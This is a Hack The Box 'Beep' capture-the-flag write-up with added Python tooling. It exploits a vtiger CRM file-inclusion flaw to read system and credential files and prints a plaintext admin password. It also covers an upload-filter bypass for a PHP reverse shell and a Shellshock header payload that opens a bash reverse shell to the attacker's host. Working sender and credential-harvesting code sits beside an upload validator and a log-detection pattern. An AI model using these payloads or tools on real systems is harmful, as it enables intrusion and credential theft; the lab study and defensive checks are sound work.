HTB – Beep

Hello friends!! Today we are going to solve another CTF challenge, “Beep”, which is available online for those who want to improve their penetration-testing and black-box testing skills. Beep is a retired vulnerable lab presented by Hack the Box, which offers a collection of vulnerable machines ranging from beginner to expert level so you can practise according to your experience. We are starting a new Hack the Box series with Beep, a box designed for beginners.

Level: Intermediate

Task: find user.txt and root.txt file in victim’s machine.

Since these labs are available online they have static IPs; the IP of Beep is 10.10.10.7, so let’s begin with nmap port enumeration.

c:\PENTEST\NMAP>nmap -sV 10.10.10.7
Starting Nmap 7.70 ( https://nmap.org ) at 2019-01-18 11:31 W. Europe Standard Time
Nmap scan report for 10.10.10.7
Host is up (0.031s latency).
Not shown: 988 closed ports
PORT      STATE SERVICE    VERSION
22/tcp    open  ssh        OpenSSH 4.3 (protocol 2.0)
25/tcp    open  smtp       Postfix smtpd
80/tcp    open  http       Apache httpd 2.2.3
110/tcp   open  pop3       Cyrus pop3d 2.3.7-Invoca-RPM-2.3.7-7.el5_6.4
111/tcp   open  rpcbind    2 (RPC #100000)
143/tcp   open  imap       Cyrus imapd 2.3.7-Invoca-RPM-2.3.7-7.el5_6.4
443/tcp   open  ssl/http   Apache httpd 2.2.3 ((CentOS))
993/tcp   open  ssl/imap   Cyrus imapd
995/tcp   open  pop3       Cyrus pop3d
3306/tcp  open  mysql      MySQL (unauthorized)
4445/tcp  open  upnotifyp?
10000/tcp open  http       MiniServ 1.570 (Webmin httpd)
Service Info: Hosts:  beep.localdomain, 127.0.0.1, example.com

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 194.30 seconds

Knowing port 80 is open on the target we browsed to its IP, but the page itself gave no remarkable clue for the next step.

As you can see in the image below, the web root redirects to the Elastix login portal.

Next we used the dirb tool in Kali to brute-force directories with a wordlist. The command we used is dirb https://10.10.10.7/ /usr/share/wordlists/dirb/big.txt. After checking most of the directories it found, we decided to look at the vtigercrm directory.

So next we browsed to http://10.10.10.7/vtigercrm and found another login portal, this time for vtiger CRM. Looking at the page for clues, the version, vtiger CRM 5.1, is printed in the bottom left of the page, as shown below.

vtiger CRM 5.1.0 has a known local file inclusion (LFI) in the file modules/com_vtiger_workflow/sortfieldsjson.php: the module_name parameter is used to build a file path without sanitisation, and a trailing null byte (%00) truncates whatever suffix the script appends, so arbitrary files can be read without logging in.

Try this:
https://10.10.10.7/vtigercrm/modules/com_vtiger_workflow/sortfieldsjson.php?module_name=../../../../../../../../etc/passwd%00

The /vtigercrm directory is the interesting one: the LFI exploit for vtiger CRM gives us both the user flag and the admin credentials for the vtiger login.

User flag: /etc/passwd shows that the only ordinary user is fanis, so the user flag sits in that user's home directory and can be read through the same LFI.

Admin credentials: pointing the LFI at /etc/amportal.conf (the FreePBX/Asterisk configuration) dumps a long file; read it line by line until you reach the password entries.
Username = admin
Password = jEhdIekWmdjE
Using these credentials we can log in to the vtiger CRM dashboard as admin.

Shell
Go to Settings > Company Details, click Edit, and you will notice that the company logo field lets us upload an image in place of the logo.
The file picker only accepts image names, so rename the PHP payload by adding ;.jpg after .php (for example shell.php;.jpg) to get past the browser-side image restriction.

First Method – (NC)
Download the PHP reverse shell payload and edit the IP and port accordingly, then browse to the file, click Save and capture the POST request in Burp.
Remove ;.jpg from the filename in the request and forward it, so the server stores the file as plain .php.
Make sure the file has been uploaded successfully.
Now start a netcat listener on the port you put in the payload and browse to the file location to get the shell.
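As an added example, and not code from the post or from vtiger, the check below shows why a name like shell.php;.jpg slips past an extension-only test, and what a server-side check for a logo field should do instead: take only the base name, allow a single image extension, verify the magic bytes, and store the file under a generated name. All function names and the sample bytes are assumptions made for the example.

```python
import os
import re
import secrets

# Magic bytes for the image types a logo field should accept.
IMAGE_MAGIC = {
    "jpg": b"\xff\xd8\xff",
    "jpeg": b"\xff\xd8\xff",
    "png": b"\x89PNG\r\n\x1a\n",
    "gif": b"GIF8",
}


def naive_is_image(filename: str) -> bool:
    """The kind of check shell.php;.jpg passes: only the text after the last dot is examined.
    A browser 'images only' file filter is fooled the same way."""
    return filename.lower().rsplit(".", 1)[-1] in IMAGE_MAGIC


# One safe base name, a single image extension, nothing else.
SAFE_NAME = re.compile(r"[A-Za-z0-9_-]{1,64}\.(jpe?g|png|gif)", re.IGNORECASE)


def hardened_accept(filename: str, data: bytes) -> tuple[bool, str]:
    """Server-side check for an image upload. Returns (accepted, reason)."""
    base = os.path.basename(filename)
    if not base or base != filename or "\\" in filename:
        return False, "path components are not allowed in an upload name"
    if not SAFE_NAME.fullmatch(base):
        # Rejects ';', spaces and double extensions such as shell.php.jpg, which an
        # Apache AddHandler-based PHP configuration would otherwise execute.
        return False, "name must be letters/digits/_/- plus one image extension"
    ext = base.rsplit(".", 1)[1].lower()
    if not data.startswith(IMAGE_MAGIC[ext]):
        return False, f"content does not start with the {ext} signature"
    return True, "ok"


def stored_name(ext: str) -> str:
    """Never keep the client's name on disk: a random name with the verified extension."""
    return f"{secrets.token_hex(16)}.{ext}"


# Constructed inputs for a quick self-check (not the files used against the box).
PHP_STUB = b"<?php system($_GET['cmd']); ?>"
JPEG_SAMPLE = IMAGE_MAGIC["jpg"] + b"\x00" * 32

if __name__ == "__main__":
    print("naive check accepts shell.php;.jpg:", naive_is_image("shell.php;.jpg"))
    for name, data in [("shell.php;.jpg", PHP_STUB), ("shell.php.jpg", JPEG_SAMPLE),
                       ("../logo.jpg", JPEG_SAMPLE), ("logo.jpg", PHP_STUB),
                       ("logo.jpg", JPEG_SAMPLE)]:
        print(name, hardened_accept(name, data))
```

The magic-byte test matters as much as the name test: the upload in this post is a PHP file, and a name check alone would still accept it if the attacker simply called it logo.jpg and the web server was willing to execute it from the upload directory. Storing uploads under a generated name (and outside any directory the PHP handler serves) closes the rest of the path.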

Next we decided to use Burp to exploit the Shellshock vulnerability through Webmin (MiniServ 1.570 on port 10000), whose CGI scripts hand request headers such as User-Agent to bash as environment variables.

burp : https://10.10.10.7:10000/session_login.cgi
GET /session_login.cgi HTTP/1.1
Host: 10.10.10.7:10000
User-Agent: () { :; }; bash -i >& /dev/tcp/10.10.14.12/8081 0>&1

Before sending the request from Burp we started a listener with the netcat command nc -lvp 8081. Once the connection came back from the victim host we ran id, which shows the shell is already running as root, and ls to look at the files and folders in the current directory.

c:\PENTEST>nc -lvp 8081
listening on [any] 8081 ...
10.10.10.7: inverse host lookup failed: h_errno 11004: NO_DATA
connect to [10.10.14.12] from (UNKNOWN) [10.10.10.7] 60581: NO_DATA
bash: no job control in this shell
[root@beep webmin]# id
uid=0(root) gid=0(root)

Being root, we can list root's home directory with ls /root, which shows the root.txt file, and read its content with cat /root/root.txt.
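The Shellshock request and its detection side, as an added example rather than the post's own tooling: build_shellshock_request() reproduces the Burp request above as raw bytes, send_probe() delivers it over TLS to Webmin, and is_shellshock()/flag_log_lines() show what a defender would grep for in Webmin or Apache access logs. The hosts, ports and log lines are constructed for the example.

```python
import re
import socket
import ssl


def build_shellshock_request(host: str, port: int, lhost: str, lport: int) -> bytes:
    """Raw GET to session_login.cgi with the bash reverse shell in User-Agent.

    Webmin's CGI wrapper exports request headers as environment variables; a
    vulnerable bash parses the '() { :; };' prefix as a function definition and
    then executes whatever follows it.
    """
    payload = f"() {{ :; }}; bash -i >& /dev/tcp/{lhost}/{lport} 0>&1"
    lines = [
        "GET /session_login.cgi HTTP/1.1",
        f"Host: {host}:{port}",
        f"User-Agent: {payload}",
        "Connection: close",
        "",
        "",
    ]
    return "\r\n".join(lines).encode()


def send_probe(host: str, port: int, lhost: str, lport: int, timeout: float = 5.0) -> bytes:
    """Send the request over TLS (Webmin on 10000 is HTTPS with a self-signed cert).

    Start 'nc -lvp <lport>' first. The HTTP response is usually empty because bash
    is busy holding the reverse shell. Not called by the self-check below.
    """
    ctx = ssl.create_default_context()
    ctx.check_hostname = False
    ctx.verify_mode = ssl.CERT_NONE
    # CentOS 5 era server: allow old protocol versions (a modern OpenSSL may also
    # need its security level lowered before the handshake succeeds).
    ctx.minimum_version = ssl.TLSVersion.TLSv1
    with socket.create_connection((host, port), timeout=timeout) as raw:
        with ctx.wrap_socket(raw, server_hostname=host) as tls:
            tls.sendall(build_shellshock_request(host, port, lhost, lport))
            try:
                return tls.recv(4096)
            except socket.timeout:
                return b""


# Defender's side: the function-definition prefix that makes Shellshock work,
# tolerant of whitespace variants such as '() {:;};'.
SHELLSHOCK_RE = re.compile(r"\(\s*\)\s*\{[^}]*\}\s*;")


def is_shellshock(value: str) -> bool:
    return SHELLSHOCK_RE.search(value) is not None


def flag_log_lines(lines):
    """Return (1-based line number, matched fragment) for every log line carrying the marker."""
    hits = []
    for n, line in enumerate(lines, 1):
        m = SHELLSHOCK_RE.search(line)
        if m:
            hits.append((n, m.group(0)))
    return hits


# Constructed Apache combined-format lines (not real logs from the box).
SAMPLE_LOG = [
    '10.10.14.12 - - [18/Jan/2019:11:45:10 +0100] "GET /session_login.cgi HTTP/1.1" 200 0 "-" '
    '"() { :; }; bash -i >& /dev/tcp/10.10.14.12/8081 0>&1"',
    '10.10.14.12 - - [18/Jan/2019:11:45:12 +0100] "GET / HTTP/1.1" 302 314 "-" "Mozilla/5.0"',
    '10.10.14.12 - - [18/Jan/2019:11:45:20 +0100] "GET /cgi-bin/test.cgi HTTP/1.1" 200 12 '
    '"() {:;}; /usr/bin/id" "curl/7.64.0"',
]

if __name__ == "__main__":
    print(build_shellshock_request("10.10.10.7", 10000, "10.10.14.12", 8081).decode())
    for n, frag in flag_log_lines(SAMPLE_LOG):
        print(f"line {n}: {frag}")
```

The third sample line carries the payload in the Referer field rather than User-Agent: any header that the CGI wrapper exports is a valid carrier, so the detection runs over the whole line, not one column.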

Simple way to find credentials and login with ssh

The LFI alone is enough to finish the box without the web shell or Shellshock: read /etc/passwd for usernames and /etc/amportal.conf for passwords.

https://10.10.10.7/vtigercrm/modules/com_vtiger_workflow/sortfieldsjson.php?module_name=../../../../../../../../etc/passwd%00

https://10.10.10.7/vtigercrm/modules/com_vtiger_workflow/sortfieldsjson.php?module_name=../../../../../../../../etc/amportal.conf%00

The passwords in amportal.conf are the ones reused for the web admin and, as the heading says, for SSH, so try them against the accounts found in /etc/passwd. One caveat: the target runs OpenSSH 4.3, whose key-exchange and host-key algorithms (SHA-1 based Diffie-Hellman groups and ssh-rsa) are disabled by default in current OpenSSH clients, so you typically have to re-enable them, for example ssh -oKexAlgorithms=+diffie-hellman-group1-sha1 -oHostKeyAlgorithms=+ssh-rsa user@10.10.10.7, or the client refuses to negotiate.

Beyond that, I look for interesting files belonging to the programs I know are installed and can reach through the LFI, such as Asterisk (https://www.voip-info.org/asterisk-config-files/).
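An added helper for this section and for the LFI steps earlier in the post (not code from the post or from vtiger): it builds the sortfieldsjson.php LFI URL, picks the likely flag owner out of /etc/passwd, pulls the credential entries out of amportal.conf so you do not have to read it line by line, and lists the Asterisk configuration files worth requesting next. fetch() needs the box; the sample passwd and amportal.conf contents are constructed placeholders, not the real files, and the function names are my own.

```python
import ssl
import urllib.request

LFI_PATH = "/vtigercrm/modules/com_vtiger_workflow/sortfieldsjson.php"

# amportal.conf keys that carry credentials (FreePBX database, Asterisk manager,
# and the ARI/web admin user).
CRED_KEYS = {
    "AMPDBUSER", "AMPDBPASS", "AMPMGRUSER", "AMPMGRPASS",
    "ARI_ADMIN_USERNAME", "ARI_ADMIN_PASSWORD", "FOPPASSWORD",
}

# Asterisk/FreePBX files worth reading once the LFI is confirmed.
ASTERISK_FILES = [
    "/etc/amportal.conf",
    "/etc/asterisk/manager.conf",
    "/etc/asterisk/sip.conf",
    "/etc/asterisk/extensions.conf",
    "/etc/asterisk/voicemail.conf",
]


def build_lfi_url(host: str, target: str, depth: int = 8, scheme: str = "https") -> str:
    """module_name is concatenated into a path: '../' climbs to /, and %00 cuts off the
    suffix the script appends (null-byte truncation, fixed in PHP 5.3.4, still present here)."""
    traversal = "../" * depth
    return f"{scheme}://{host}{LFI_PATH}?module_name={traversal}{target.lstrip('/')}%00"


def fetch(url: str, timeout: float = 10.0) -> str:
    """GET over HTTPS, ignoring the self-signed certificate. Needs network access."""
    ctx = ssl.create_default_context()
    ctx.check_hostname = False
    ctx.verify_mode = ssl.CERT_NONE
    with urllib.request.urlopen(url, context=ctx, timeout=timeout) as resp:
        return resp.read().decode("utf-8", errors="replace")


def login_users(passwd_text: str) -> list[str]:
    """Accounts with a home under /home and a real shell: the candidates that own user.txt."""
    users = []
    for line in passwd_text.splitlines():
        fields = line.split(":")
        if len(fields) != 7:
            continue
        name, _, _, _, _, home, shell = fields
        if home.startswith("/home/") and not shell.endswith(("nologin", "false")):
            users.append(name)
    return users


def amportal_credentials(conf_text: str) -> dict[str, str]:
    """KEY=VALUE lines from amportal.conf, restricted to the credential keys."""
    creds = {}
    for line in conf_text.splitlines():
        line = line.strip()
        if not line or line.startswith("#") or "=" not in line:
            continue
        key, value = (part.strip() for part in line.split("=", 1))
        if key in CRED_KEYS:
            creds[key] = value
    return creds


def password_candidates(creds: dict[str, str]) -> list[str]:
    """Distinct password values, in file order, to try against vtiger, Webmin and SSH."""
    seen = []
    for key, value in creds.items():
        if "PASS" in key and value and value not in seen:
            seen.append(value)
    return seen


def candidate_urls(host: str) -> list[str]:
    return [build_lfi_url(host, path) for path in ASTERISK_FILES]


# Constructed samples (placeholders, not the contents of the real files).
SAMPLE_PASSWD = "\n".join([
    "root:x:0:0:root:/root:/bin/bash",
    "sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin",
    "asterisk:x:100:101:Asterisk PBX:/var/lib/asterisk:/bin/bash",
    "fanis:x:500:500::/home/fanis:/bin/bash",
])
SAMPLE_AMPORTAL = """# constructed amportal.conf fragment
AMPDBUSER=asteriskuser
AMPDBPASS=dbpass_example
AMPMGRUSER=admin
AMPMGRPASS=mgrpass_example
ARI_ADMIN_USERNAME=admin
ARI_ADMIN_PASSWORD=aripass_example
AMPWEBROOT=/var/www/html
"""

if __name__ == "__main__":
    print(build_lfi_url("10.10.10.7", "/etc/passwd"))
    print("login users:", login_users(SAMPLE_PASSWD))
    print("passwords to try:", password_candidates(amportal_credentials(SAMPLE_AMPORTAL)))
    for url in candidate_urls("10.10.10.7"):
        print(url)
```

Against the live box you would call fetch(build_lfi_url("10.10.10.7", "/etc/amportal.conf")) and pass the result through amportal_credentials(); the password list it returns is what to try against vtiger, Webmin and SSH for each user from login_users().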

Author: Jacco Straathof
